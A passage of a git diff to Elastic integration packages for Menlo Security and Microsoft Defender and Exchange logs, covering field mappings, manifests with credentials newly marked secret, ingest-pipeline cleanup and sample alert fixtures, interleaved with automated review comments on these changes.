| keyword | +| input.type | Input type | keyword | +| log.offset | Log offset | long | +| menlo.dlp.alerted | Whether or not an email alert was sent to a DLP Auditor profile | boolean | +| menlo.dlp.category | Category Rules Category type classification | keyword | +| menlo.dlp.ccl.id | Name of DLP dictionary that was violated | keyword | +| menlo.dlp.ccl.match_counts | Number of matches of the string that caused the violation | long | +| menlo.dlp.ccl.score | DLP score from the dictionary that caused the violation | long | +| menlo.dlp.status | Result from the DLP engine | keyword | +| menlo.dlp.stream_name | Internal name used for the file (usually working_file) or text stream (uid) | keyword | +| menlo.dlp.user_input | Whether or not this event was generated as a result of user form input | boolean | +| observer.product | The product name of the observer. | keyword | +| observer.vendor | Vendor name of the observer. | keyword | +| observer.version | Observer version. | keyword | +| related.hash | All the hashes seen on your event. Populating this field, then using it to search for hashes can help in situations where you're unsure what the hash algorithm is (and therefore which key name to search). | keyword | +| related.user | All the user names or other user identifiers seen on the event. | keyword | +| rule.id | A rule ID that is unique within the scope of an agent, observer, or other entity using the rule for detection of this event. | keyword | +| rule.name | The name of the rule or signature generating the event. | keyword | +| tags | List of keywords used to tag each event. | keyword | +| url.domain | Domain of the url, such as "www.elastic.co". In some cases a URL may refer to an IP and/or port directly, without a domain name. In this case, the IP address would go to the `domain` field. If the URL contains a literal IPv6 address enclosed by `[` and `]` (IETF RFC 2732), the `[` and `]` characters should also be captured in the `domain` field. 
| keyword | +| url.original | Unmodified original url as seen in the event source. Note that in network monitoring, the observed URL may be a full URL, whereas in access logs, the URL is often just represented as a path. This field is meant to represent the URL as it was observed, complete or not. | wildcard | +| url.original.text | Multi-field of `url.original`. | match_only_text | +| url.path | Path of the request, such as "/search". | wildcard | +| url.registered_domain | The highest registered url domain, stripped of the subdomain. For example, the registered domain for "foo.example.com" is "example.com". This value can be determined precisely with a list like the public suffix list (http://publicsuffix.org). Trying to approximate this by simply taking the last two labels will not work well for TLDs such as "co.uk". | keyword | +| url.scheme | Scheme of the request, such as "https". Note: The `:` is not part of the scheme. | keyword | +| url.top_level_domain | The effective top level domain (eTLD), also known as the domain suffix, is the last part of the domain name. For example, the top level domain for example.com is "com". This value can be determined precisely with a list like the public suffix list (http://publicsuffix.org). Trying to approximate this by simply taking the last label will not work well for effective TLDs such as "co.uk". | keyword | +| user.name | Short name or login of the user. | keyword | +| user.name.text | Multi-field of `user.name`. | match_only_text | + diff --git a/packages/menlo/img/logo.png b/packages/menlo/img/logo.png new file mode 100644 index 00000000000..e9e1eeb9a9b Binary files /dev/null and b/packages/menlo/img/logo.png differ diff --git a/packages/menlo/manifest.yml b/packages/menlo/manifest.yml new file mode 100644 index 00000000000..9b22ff2c519 --- /dev/null +++ b/packages/menlo/manifest.yml 
@@ -0,0 +1,85 @@ +format_version: "3.0.2" +name: menlo +title: "Menlo Security" +version: 0.1.0 +source: + license: "Elastic-2.0" +description: "Collect logs from Menlo Security products with Elastic Agent" +type: integration +categories: + - monitoring + - network + - security +conditions: + kibana: + version: "^8.13.0" + elastic: + subscription: "basic" + capabilities: + - security +icons: + - src: /img/logo.png + title: Menlo Security logo + size: 32x32 + type: image/svg+xml +policy_templates: + - name: menlo + title: Menlo Security Logs + description: Collect Menlo Security logs + inputs: + - type: cel + title: Collect event from Menlo API + description: Collect Menlo Security logs via the Menlo Log API + vars: + - name: url + type: text + title: URL + description: URL for the Menlo Security API (Add https:// before the url). + default: https://logs.menlosecurity.com/api/rep/v1/fetch/client_select + show_user: true + required: true + - name: token + type: password + title: API key + secret: true + description: API key for the Menlo Security API. + required: true + - name: proxy_url + type: text + title: Proxy URL + multi: false + required: false + show_user: false + description: URL to proxy connections in the form of http[s]://:@:. Please ensure your username and password are in URL encoded format. + - name: ssl + type: yaml + title: SSL Configuration + description: i.e. certificate_authorities, supported_protocols, verification_mode etc. 
+ multi: false + required: false + show_user: false + default: | + #certificate_authorities: + # - | + # -----BEGIN CERTIFICATE----- + # MIIDCjCCAfKgAwIBAgITJ706Mu2wJlKckpIvkWxEHvEyijANBgkqhkiG9w0BAQsF + # ADAUMRIwEAYDVQQDDAlsb2NhbGhvc3QwIBcNMTkwNzIyMTkyOTA0WhgPMjExOTA2 + # MjgxOTI5MDRaMBQxEjAQBgNVBAMMCWxvY2FsaG9zdDCCASIwDQYJKoZIhvcNAQEB + # BQADggEPADCCAQoCggEBANce58Y/JykI58iyOXpxGfw0/gMvF0hUQAcUrSMxEO6n + # fZRA49b4OV4SwWmA3395uL2eB2NB8y8qdQ9muXUdPBWE4l9rMZ6gmfu90N5B5uEl + # 94NcfBfYOKi1fJQ9i7WKhTjlRkMCgBkWPkUokvBZFRt8RtF7zI77BSEorHGQCk9t + # /D7BS0GJyfVEhftbWcFEAG3VRcoMhF7kUzYwp+qESoriFRYLeDWv68ZOvG7eoWnP + # PsvZStEVEimjvK5NSESEQa9xWyJOmlOKXhkdymtcUd/nXnx6UTCFgnkgzSdTWV41 + # CI6B6aJ9svCTI2QuoIq2HxX/ix7OvW1huVmcyHVxyUECAwEAAaNTMFEwHQYDVR0O + # BBYEFPwN1OceFGm9v6ux8G+DZ3TUDYxqMB8GA1UdIwQYMBaAFPwN1OceFGm9v6ux + # 8G+DZ3TUDYxqMA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQELBQADggEBAG5D + # 874A4YI7YUwOVsVAdbWtgp1d0zKcPRR+r2OdSbTAV5/gcS3jgBJ3i1BN34JuDVFw + # 3DeJSYT3nxy2Y56lLnxDeF8CUTUtVQx3CuGkRg1ouGAHpO/6OqOhwLLorEmxi7tA + # H2O8mtT0poX5AnOAhzVy7QW0D/k4WaoLyckM5hUa6RtvgvLxOwA0U+VGurCDoctu + # 8F4QOgTAWyh8EZIwaKCliFRSynDpv3JTUwtfZkxo6K6nce1RhCWFAsMvDZL8Dgc0 + # yvgJ39BRsFOtkRuAGSf6ZUwTO8JJRRIFnpUzXflAnGivK9M13D5GEQMmIl6U9Pvk + # sxSmbIUfc2SGJGCJD4I= + # -----END CERTIFICATE----- +owner: + github: elastic/security-service-integrations + type: elastic diff --git a/packages/microsoft_defender_cloud/changelog.yml b/packages/microsoft_defender_cloud/changelog.yml index e3ea43e4c3e..00edfaccb95 100644 --- a/packages/microsoft_defender_cloud/changelog.yml +++ b/packages/microsoft_defender_cloud/changelog.yml 
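Review bot: The icon entry declares `type: image/svg+xml` while `src: /img/logo.png` points at the PNG added in this same commit (`packages/menlo/img/logo.png`); change it to `type: image/png` or ship an SVG, so the asset is not served under the wrong content type. The `proxy_url` variable is a plain `type: text` var whose description invites a `user:password@host:port` URL, so any proxy credentials would be stored and shown unmasked in the agent policy; consider documenting that credentials should not be placed there, or marking the var `secret: true` if the spec version permits that for text vars. The placeholders in that same description appear to have been lost (`http[s]://:@:.`), which may be a rendering artifact of this page rather than the file, but is worth checking. Minor: the `ssl` description's `i.e.` should be `e.g.`, since what follows is a list of examples.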
@@ -1,4 +1,14 @@ # newer versions go on top +- version: "1.1.1" + changes: + - description: Add cloudsecurity_cdr sub category label + type: enhancement + link: https://github.com/elastic/integrations/pull/9213 +- version: "1.1.0" + changes: + - description: Set sensitive values as secret and add missing mappings. + type: enhancement + link: https://github.com/elastic/integrations/pull/9127 - version: "1.0.1" changes: - description: Changed owners diff --git a/packages/microsoft_defender_cloud/data_stream/event/fields/fields.yml b/packages/microsoft_defender_cloud/data_stream/event/fields/fields.yml index 41f47ef3247..8bedce890af 100644 --- a/packages/microsoft_defender_cloud/data_stream/event/fields/fields.yml +++ b/packages/microsoft_defender_cloud/data_stream/event/fields/fields.yml @@ -107,6 +107,16 @@ fields: - name: ref type: keyword + - name: id + type: keyword + - name: type + type: keyword + - name: asset + type: boolean + - name: value + type: keyword + - name: algorithm + type: keyword - name: files type: group fields: @@ -238,6 +248,8 @@ type: keyword - name: protocol type: keyword + - name: ref + type: keyword - name: related_azure_resource_ids type: keyword - name: resource_id diff --git a/packages/microsoft_defender_cloud/data_stream/event/manifest.yml b/packages/microsoft_defender_cloud/data_stream/event/manifest.yml index 3bcc4ec4095..c1afa57281d 100644 --- a/packages/microsoft_defender_cloud/data_stream/event/manifest.yml +++ b/packages/microsoft_defender_cloud/data_stream/event/manifest.yml @@ -29,6 +29,7 @@ streams: multi: false required: true show_user: true + secret: true description: >- The connection string required to communicate with Azure Event Hubs. See [Get an Azure Event Hubs connection string](https://docs.microsoft.com/en-us/azure/event-hubs/event-hubs-get-connection-string) to learn more. - name: storage_account 
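Review bot: The new `file_hashes.value` and `file_hashes.algorithm` mappings in the first hunk of fields.yml are plain `keyword` fields with no description, and nothing in this commit shows the hash value feeding `related.hash`; unless the ingest pipeline (outside this diff) already lowercases `value` and appends it to `related.hash`, hash pivots across data streams will miss these events, so that is worth confirming in a follow-up. A short `description:` on each new field, e.g. `description: File hash value as reported for the entity.` and `description: Hash algorithm name as reported by Defender for Cloud.`, would also stop the README rows added in this commit from rendering with an empty description column. The `ref` field added in the second hunk of this file has the same empty-description gap.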
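Review bot: The `secret: true` added in the first data_stream manifest hunk sits on a variable whose `type:` line is outside the hunk (from its description it is presumably the Event Hubs connection string, which embeds the shared access key); if that var is still `type: text`, the value may still be displayed in clear in the policy editor even though Fleet stores it as a secret, so it should be switched to `type: password` the same way `storage_account_key` is in the following hunk. The var's enclosing block starts before this hunk, so the current type cannot be confirmed from the diff.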
@@ -40,11 +41,12 @@ streams: description: >- The name of the storage account where the consumer group's state/offsets will be stored and updated. - name: storage_account_key - type: text + type: password title: Storage Account Key multi: false required: true show_user: true + secret: true description: >- The storage account key will be used to authorise access to data in your storage account. - name: storage_account_container diff --git a/packages/microsoft_defender_cloud/docs/README.md b/packages/microsoft_defender_cloud/docs/README.md index b676d49901c..28c460ada13 100644 --- a/packages/microsoft_defender_cloud/docs/README.md +++ b/packages/microsoft_defender_cloud/docs/README.md @@ -116,7 +116,12 @@ This is the `Event` dataset. | microsoft_defender_cloud.event.entities.elevation_token | | keyword | | microsoft_defender_cloud.event.entities.end_time_utc | | date | | microsoft_defender_cloud.event.entities.etag | | keyword | +| microsoft_defender_cloud.event.entities.file_hashes.algorithm | | keyword | +| microsoft_defender_cloud.event.entities.file_hashes.asset | | boolean | +| microsoft_defender_cloud.event.entities.file_hashes.id | | keyword | | microsoft_defender_cloud.event.entities.file_hashes.ref | | keyword | +| microsoft_defender_cloud.event.entities.file_hashes.type | | keyword | +| microsoft_defender_cloud.event.entities.file_hashes.value | | keyword | | microsoft_defender_cloud.event.entities.files.ref | | keyword | | microsoft_defender_cloud.event.entities.host.ref | | keyword | | microsoft_defender_cloud.event.entities.host_ip_address.ref | | keyword | 
@@ -166,6 +171,7 @@ This is the `Event` dataset. | microsoft_defender_cloud.event.entities.process_id | | keyword | | microsoft_defender_cloud.event.entities.project_id | | keyword | | microsoft_defender_cloud.event.entities.protocol | | keyword | +| microsoft_defender_cloud.event.entities.ref | | keyword | | microsoft_defender_cloud.event.entities.related_azure_resource_ids | | keyword | | microsoft_defender_cloud.event.entities.resource_id | | keyword | | microsoft_defender_cloud.event.entities.resource_name | | keyword | diff --git a/packages/microsoft_defender_cloud/manifest.yml b/packages/microsoft_defender_cloud/manifest.yml index a1913687631..0df7c71b14c 100644 --- a/packages/microsoft_defender_cloud/manifest.yml +++ b/packages/microsoft_defender_cloud/manifest.yml @@ -1,14 +1,15 @@ -format_version: "3.0.0" +format_version: "3.0.2" name: microsoft_defender_cloud title: Microsoft Defender for Cloud -version: "1.0.1" +version: "1.1.1" description: Collect logs from Microsoft Defender for Cloud with Elastic Agent. type: integration categories: - security + - cloudsecurity_cdr conditions: kibana: - version: ^8.3.0 + version: ^8.12.0 elastic: subscription: basic screenshots: diff --git a/packages/microsoft_defender_endpoint/changelog.yml b/packages/microsoft_defender_endpoint/changelog.yml index b9b3118c9fc..f8314cd2924 100644 --- a/packages/microsoft_defender_endpoint/changelog.yml +++ b/packages/microsoft_defender_endpoint/changelog.yml 
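Review bot: Raising `conditions.kibana.version` from `^8.3.0` to `^8.12.0` in the package manifest is a user-visible compatibility change that neither of the 1.1.0/1.1.1 changelog entries in this commit mentions; a line such as `- description: Require Kibana 8.12.0 or later.` next to the "Set sensitive values as secret" entry would make the reason for the bump discoverable to users upgrading. That the bump is driven by secret-variable support is inferred from the changelog wording, not from this hunk.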
@@ -1,4 +1,24 @@ # newer versions go on top +- version: "2.24.2" + changes: + - description: Fix bug handling message field when events are received from Logstash with `ecs_compatibility` turned on. + type: bugfix + link: https://github.com/elastic/integrations/pull/9522 +- version: "2.24.1" + changes: + - description: Fix handling of empty arrays. + type: bugfix + link: https://github.com/elastic/integrations/pull/9338 +- version: "2.24.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/9127 +- version: "2.23.3" + changes: + - description: Clean up null handling + type: bugfix + link: https://github.com/elastic/integrations/pull/9176 - version: "2.23.2" changes: - description: Changed owners diff --git a/packages/microsoft_defender_endpoint/data_stream/log/_dev/test/pipeline/test-defenderatp.log b/packages/microsoft_defender_endpoint/data_stream/log/_dev/test/pipeline/test-defenderatp.log index c673f5b73aa..c03b3507a96 100644 --- a/packages/microsoft_defender_endpoint/data_stream/log/_dev/test/pipeline/test-defenderatp.log +++ b/packages/microsoft_defender_endpoint/data_stream/log/_dev/test/pipeline/test-defenderatp.log 
@@ -2,4 +2,5 @@ {"id":"da637291048912199236_1126926584","incidentId":11,"investigationId":7,"assignedTo":null,"severity":"Medium","status":"New","classification":null,"determination":null,"investigationState":"TerminatedByUser","detectionSource":"WindowsDefenderAtp","category":"DefenseEvasion","threatFamilyName":null,"title":"Suspicious process injection observed","description":"A process abnormally injected code into another process, As a result, unexpected code may be running in the target process memory. Injection is often used to hide malicious code execution within a trusted process. \nAs a result, the target process may exhibit abnormal behaviors such as opening a listening port or connecting to a command and control server.","alertCreationTime":"2020-06-30T09:08:11.1084877Z","firstEventTime":"2020-06-30T09:04:56.8490679Z","lastEventTime":"2020-06-30T09:45:39.5484377Z","lastUpdateTime":"2020-06-30T15:29:44.7733333Z","resolvedTime":null,"machineId":"543bc5a964f417c11f6277d5bf9489f0d","computerDnsName":"testserver4","rbacGroupName":null,"aadTenantId":"123543-d66c-4c7e-9e30-40034eb7c6f3","relatedUser":{"userName":"administrator1","domainName":"TestServer4"},"comments":[],"evidence":{"entityType":"Process","sha1":"b6d237154f2e528f0b503b58b025862d66b02b73","sha256":"a92056d772260b39a876d01552496b2f8b4610a0b1e084952fe1176784e2ce77","fileName":"notepad.exe","filePath":"C:\\Windows\\System32","processId":4104,"processCommandLine":"\"notepad.exe\"","processCreationTime":"2020-06-30T09:45:38.9784654Z","parentProcessId":6012,"parentProcessCreationTime":"2020-06-30T09:04:51.487396Z","ipAddress":null,"url":null,"accountName":null,"domainName":null,"userSid":null,"aadUserId":null,"userPrincipalName":null}} 
{"id":"da637291048912199236_1126926584","incidentId":11,"investigationId":7,"assignedTo":null,"severity":"Medium","status":"New","classification":null,"determination":null,"investigationState":"TerminatedByUser","detectionSource":"WindowsDefenderAtp","category":"DefenseEvasion","threatFamilyName":null,"title":"Suspicious process injection observed","description":"A process abnormally injected code into another process, As a result, unexpected code may be running in the target process memory. Injection is often used to hide malicious code execution within a trusted process. \nAs a result, the target process may exhibit abnormal behaviors such as opening a listening port or connecting to a command and control server.","alertCreationTime":"2020-06-30T09:08:11.1084877Z","firstEventTime":"2020-06-30T09:04:56.8490679Z","lastEventTime":"2020-06-30T09:45:39.5484377Z","lastUpdateTime":"2020-06-30T15:29:44.7733333Z","resolvedTime":null,"machineId":"53425a964f417c11f6277d5bf9489f0d","computerDnsName":"testserver4","rbacGroupName":null,"aadTenantId":"43521344-d66c-4c7e-9e30-40034eb7c6f3","relatedUser":{"userName":"administrator1","domainName":"TestServer4"},"comments":[],"evidence":{"entityType":"User","sha1":null,"sha256":null,"fileName":null,"filePath":null,"processId":null,"processCommandLine":null,"processCreationTime":null,"parentProcessId":null,"parentProcessCreationTime":null,"ipAddress":null,"url":null,"accountName":"administrator1","domainName":"TestServer4","userSid":"S-1-5-21-46152456-1367606905-4031241297-500","aadUserId":null,"userPrincipalName":null}} {"id":"da637291063515066999_-2102938302","incidentId":12,"investigationId":9,"assignedTo":"Automation","severity":"Informational","status":"Resolved","classification":null,"determination":null,"investigationState":"Benign","detectionSource":"WindowsDefenderAv","category":"Malware","threatFamilyName":null,"title":"'Mountsi' malware was detected","description":"Malware and unwanted software are undesirable 
applications that perform annoying, disruptive, or harmful actions on affected machines. Some of these undesirable applications can replicate and spread from one machine to another. Others are able to receive commands from remote attackers and perform activities associated with cyber attacks.\n\nThis detection might indicate that the malware was stopped from delivering its payload. However, it is prudent to check the machine for signs of infection.","alertCreationTime":"2020-06-30T09:32:31.4579225Z","firstEventTime":"2020-06-30T09:31:22.5729558Z","lastEventTime":"2020-06-30T09:46:15.0876676Z","lastUpdateTime":"2020-06-30T11:13:12.9Z","resolvedTime":"2020-06-30T11:13:12.2680434Z","machineId":"t4563234bc5a964f417c11f6277d5bf9489f0d","computerDnsName":"TESTSERVER4","rbacGroupName":null,"aadTenantId":"1234543-d66c-4c7e-9e30-40034eb7c6f3","relatedUser":null,"comments":[],"evidence":{"entityType":"File","sha1":"ffb1670c6c6a9c5b4c5cea8b6b8e68d62e7ff281","sha256":"fd46705c4f67a8ef16e76259ca6d6253241e51a1f8952223145f92aa1907d356","fileName":"amsistream-1D89ECED25A52AB98B76FF619B7BA07A","filePath":null,"processId":null,"processCommandLine":null,"processCreationTime":null,"parentProcessId":null,"parentProcessCreationTime":null,"ipAddress":null,"url":null,"accountName":null,"domainName":null,"userSid":null,"aadUserId":null,"userPrincipalName":null}} +{"id":"da637291063515066999_-2102938302","incidentId":12,"investigationId":9,"assignedTo":"Automation","severity":"Informational","status":"Resolved","classification":null,"determination":null,"investigationState":"Benign","detectionSource":"WindowsDefenderAv","category":"Malware","threatFamilyName":null,"title":"'Mountsi' malware was detected","description":"Malware and unwanted software are undesirable applications that perform annoying, disruptive, or harmful actions on affected machines. Some of these undesirable applications can replicate and spread from one machine to another. 
Others are able to receive commands from remote attackers and perform activities associated with cyber attacks.\n\nThis detection might indicate that the malware was stopped from delivering its payload. However, it is prudent to check the machine for signs of infection.","alertCreationTime":"2020-06-30T09:32:31.4579225Z","firstEventTime":"2020-06-30T09:31:22.5729558Z","lastEventTime":"2020-06-30T09:46:15.0876676Z","lastUpdateTime":"2020-06-30T11:13:12.9Z","resolvedTime":"2020-06-30T11:13:12.2680434Z","machineId":"t4563234bc5a964f417c11f6277d5bf9489f0d","computerDnsName":"TESTSERVER4","rbacGroupName":null,"aadTenantId":"1234543-d66c-4c7e-9e30-40034eb7c6f3","relatedUser":null,"comments":[],"evidence":[]} {"value":[]} diff --git a/packages/microsoft_defender_endpoint/data_stream/log/_dev/test/pipeline/test-defenderatp.log-expected.json b/packages/microsoft_defender_endpoint/data_stream/log/_dev/test/pipeline/test-defenderatp.log-expected.json index d6773ff07b5..9de673dfa02 100644 --- a/packages/microsoft_defender_endpoint/data_stream/log/_dev/test/pipeline/test-defenderatp.log-expected.json +++ b/packages/microsoft_defender_endpoint/data_stream/log/_dev/test/pipeline/test-defenderatp.log-expected.json 
@@ -357,6 +357,80 @@ } } }, + { + "cloud": { + "account": { + "id": "1234543-d66c-4c7e-9e30-40034eb7c6f3" + }, + "instance": { + "id": "t4563234bc5a964f417c11f6277d5bf9489f0d" + }, + "provider": "azure" + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "Malware", + "category": [ + "host", + "malware" + ], + "created": "2020-06-30T09:32:31.4579225Z", + "duration": 892514711800, + "end": "2020-06-30T09:46:15.0876676Z", + "id": "da637291063515066999_-2102938302", + "kind": "alert", + "original": "{\"id\":\"da637291063515066999_-2102938302\",\"incidentId\":12,\"investigationId\":9,\"assignedTo\":\"Automation\",\"severity\":\"Informational\",\"status\":\"Resolved\",\"classification\":null,\"determination\":null,\"investigationState\":\"Benign\",\"detectionSource\":\"WindowsDefenderAv\",\"category\":\"Malware\",\"threatFamilyName\":null,\"title\":\"'Mountsi' malware was detected\",\"description\":\"Malware and unwanted software are undesirable applications that perform annoying, disruptive, or harmful actions on affected machines. Some of these undesirable applications can replicate and spread from one machine to another. Others are able to receive commands from remote attackers and perform activities associated with cyber attacks.\\n\\nThis detection might indicate that the malware was stopped from delivering its payload. 
However, it is prudent to check the machine for signs of infection.\",\"alertCreationTime\":\"2020-06-30T09:32:31.4579225Z\",\"firstEventTime\":\"2020-06-30T09:31:22.5729558Z\",\"lastEventTime\":\"2020-06-30T09:46:15.0876676Z\",\"lastUpdateTime\":\"2020-06-30T11:13:12.9Z\",\"resolvedTime\":\"2020-06-30T11:13:12.2680434Z\",\"machineId\":\"t4563234bc5a964f417c11f6277d5bf9489f0d\",\"computerDnsName\":\"TESTSERVER4\",\"rbacGroupName\":null,\"aadTenantId\":\"1234543-d66c-4c7e-9e30-40034eb7c6f3\",\"relatedUser\":null,\"comments\":[],\"evidence\":[]}", + "provider": "defender_endpoint", + "severity": 1, + "start": "2020-06-30T09:31:22.5729558Z", + "timezone": "UTC", + "type": [ + "end" + ] + }, + "host": { + "hostname": "TESTSERVER4", + "name": "testserver4" + }, + "message": "'Mountsi' malware was detected", + "microsoft": { + "defender_endpoint": { + "assignedTo": "Automation", + "incidentId": "12", + "investigationId": "9", + "investigationState": "Benign", + "lastUpdateTime": "2020-06-30T11:13:12.9Z", + "resolvedTime": "2020-06-30T11:13:12.2680434Z", + "status": "Resolved" + } + }, + "observer": { + "name": "WindowsDefenderAv", + "product": "Defender for Endpoint", + "vendor": "Microsoft" + }, + "related": { + "hosts": [ + "testserver4" + ] + }, + "rule": { + "description": "Malware and unwanted software are undesirable applications that perform annoying, disruptive, or harmful actions on affected machines. Some of these undesirable applications can replicate and spread from one machine to another. Others are able to receive commands from remote attackers and perform activities associated with cyber attacks.\n\nThis detection might indicate that the malware was stopped from delivering its payload. However, it is prudent to check the machine for signs of infection." + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "framework": "MITRE ATT&CK", + "technique": { + "name": [ + "Malware" + ] + } + } + }, null ] } \ No newline at end of file 
diff --git a/packages/microsoft_defender_endpoint/data_stream/log/elasticsearch/ingest_pipeline/default.yml b/packages/microsoft_defender_endpoint/data_stream/log/elasticsearch/ingest_pipeline/default.yml index 5ea6d9d7bca..3f10b215665 100644 --- a/packages/microsoft_defender_endpoint/data_stream/log/elasticsearch/ingest_pipeline/default.yml +++ b/packages/microsoft_defender_endpoint/data_stream/log/elasticsearch/ingest_pipeline/default.yml @@ -9,11 +9,16 @@ processors: target_field: event.original ignore_missing: true if: ctx.event?.original == null + - remove: + field: message + ignore_missing: true + if: 'ctx.event?.original != null' + description: 'The `message` field is no longer required if the document has an `event.original` field. Helps to maintain compatibility with the Logstash `ecs_compatibility feature`.' - json: field: event.original target_field: json - drop: - if: ctx.json?.value != null && ctx.json.value.isEmpty() + if: ctx.json?.value?.isEmpty() == true - remove: field: - json.comments @@ -26,7 +31,7 @@ processors: ######################### - script: lang: painless - if: ctx?.json != null + if: ctx.json != null params: values: - null @@ -34,12 +39,12 @@ processors: - "-" - "N/A" source: | - if (!ctx['json'].empty) { + if (!ctx.json.empty) { ctx.json.entrySet().removeIf(entry -> params.values.contains(entry.getValue())); } - script: lang: painless - if: ctx?.json?.evidence != null + if: ctx.json?.evidence != null params: values: - null 
@@ -47,9 +52,22 @@ processors: - "-" - "N/A" source: | - if (!ctx.json['evidence'].empty) { + boolean drop(Object o) { + if (o == null || o == "") { + return true; + } else if (o instanceof Map) { + ((Map) o).values().removeIf(v -> drop(v)); + return (((Map) o).size() == 0); + } else if (o instanceof List) { + ((List) o).removeIf(v -> drop(v)); + return (((List) o).length == 0); + } + return false; + } + if (!ctx.json.evidence.empty) { ctx.json.evidence.entrySet().removeIf(entry -> params.values.contains(entry.getValue())); } + drop(ctx); - set: field: cloud.provider value: azure @@ -149,10 +167,10 @@ processors: if: ctx.json?.severity == 'High' - script: lang: painless - if: "ctx?.event?.start != null && ctx?.event?.end != null" + if: ctx.event?.start != null && ctx.event?.end != null source: > - Instant eventstart = ZonedDateTime.parse(ctx?.event?.start).toInstant(); - Instant eventend = ZonedDateTime.parse(ctx?.event?.end).toInstant(); + Instant eventstart = ZonedDateTime.parse(ctx.event.start).toInstant(); + Instant eventend = ZonedDateTime.parse(ctx.event.end).toInstant(); ctx.event['duration'] = ChronoUnit.NANOS.between(eventstart, eventend); ######################## @@ -237,11 +255,11 @@ processors: field: json.evidence.url target_field: url.full ignore_missing: true - if: ctx?.json?.evidence?.url != null + if: ctx.json?.evidence?.url != null - uri_parts: field: url.full ignore_failure: true - if: ctx?.url?.full != null + if: ctx.url?.full != null ###################### ## ECS Host Mapping ## @@ -320,7 +338,7 @@ processors: ignore_missing: true - remove: field: event.original - if: "ctx?.tags == null || !(ctx.tags.contains('preserve_original_event'))" + if: ctx.tags?.contains('preserve_original_event') != true ignore_failure: true ignore_missing: true on_failure: diff --git a/packages/microsoft_defender_endpoint/data_stream/log/manifest.yml b/packages/microsoft_defender_endpoint/data_stream/log/manifest.yml index 6f03015d5a2..ea059cd3bd7 100644 
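Review bot: The recursive `drop()` helper added in this hunk treats only `null` and `""` as removable, while the processor's `params.values` visibly also lists `"-"` and `"N/A"`; the existing `removeIf` strips those placeholders from the top level of `json.evidence`, but once `drop(ctx)` walks the whole document they survive at any nested depth. If one placeholder set is meant to apply at every depth, the guard should read `if (o == null || o == "" || params.values.contains(o)) { return true; }`. Note also that `drop(ctx)` runs over the entire document, not just `json`, so any empty string, empty map or empty list anywhere in the event is removed and its boolean result is discarded; a one-line comment above the call saying this is deliberate (`// prune empty values document-wide; return value intentionally ignored`) would spare the next reader a detour.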
--- a/packages/microsoft_defender_endpoint/data_stream/log/manifest.yml +++ b/packages/microsoft_defender_endpoint/data_stream/log/manifest.yml @@ -21,12 +21,13 @@ streams: show_user: false description: The request tracer logs requests and responses to the agent's local file-system for debugging configurations. Enabling this request tracing compromises security and should only be used for debugging. See [documentation](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-input-httpjson.html#_request_tracer_filename) for details. - name: client_secret - type: text + type: password title: Client Secret description: The secret related to the client ID. multi: false required: true show_user: true + secret: true - name: tenant_id type: text title: Tenant ID @@ -78,6 +79,7 @@ streams: show_user: false default: oauth2/token description: "Microsoft supports multiple Oauth2 URL endpoints, the default is oauth2/token, but can also be oauth2/v2.0/token" + secret: false - name: request_url type: text title: Security Center URL diff --git a/packages/microsoft_defender_endpoint/data_stream/log/sample_event.json b/packages/microsoft_defender_endpoint/data_stream/log/sample_event.json index 5850c1f0c80..03136a3f89e 100644 --- a/packages/microsoft_defender_endpoint/data_stream/log/sample_event.json +++ b/packages/microsoft_defender_endpoint/data_stream/log/sample_event.json @@ -108,4 +108,4 @@ "id": "S-1-5-21-11111607-1111760036-109187956-75141", "name": "temp123" } -} +} \ No newline at end of file diff --git a/packages/microsoft_defender_endpoint/docs/README.md b/packages/microsoft_defender_endpoint/docs/README.md index 3be14539d9e..2ea1439dd51 100644 --- a/packages/microsoft_defender_endpoint/docs/README.md +++ b/packages/microsoft_defender_endpoint/docs/README.md @@ -157,7 +157,6 @@ An example event for `log` looks as following: "name": "temp123" } } - ``` **Exported fields** 
diff --git a/packages/microsoft_defender_endpoint/manifest.yml b/packages/microsoft_defender_endpoint/manifest.yml index 1af3c4880a3..bc33e45e7d0 100644 --- a/packages/microsoft_defender_endpoint/manifest.yml +++ b/packages/microsoft_defender_endpoint/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.2" name: microsoft_defender_endpoint title: Microsoft Defender for Endpoint -version: "2.23.2" +version: "2.24.2" description: Collect logs from Microsoft Defender for Endpoint with Elastic Agent. categories: - "security" @@ -9,7 +9,7 @@ categories: type: integration conditions: kibana: - version: ^8.7.1 + version: ^8.12.0 policy_templates: - name: microsoft_defender_endpoint title: Microsoft Defender for Endpoint diff --git a/packages/microsoft_exchange_online_message_trace/changelog.yml b/packages/microsoft_exchange_online_message_trace/changelog.yml index c4c644c7744..f8e4bcce547 100644 --- a/packages/microsoft_exchange_online_message_trace/changelog.yml +++ b/packages/microsoft_exchange_online_message_trace/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.19.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/9127 - version: "1.18.1" changes: - description: Changed owners diff --git a/packages/microsoft_exchange_online_message_trace/manifest.yml b/packages/microsoft_exchange_online_message_trace/manifest.yml index e4fa57173d5..b97284ff14e 100644 --- a/packages/microsoft_exchange_online_message_trace/manifest.yml +++ b/packages/microsoft_exchange_online_message_trace/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.2" name: microsoft_exchange_online_message_trace title: "Microsoft Exchange Online Message Trace" -version: "1.18.1" +version: "1.19.0" description: "Microsoft Exchange Online Message Trace Integration" type: integration categories: 
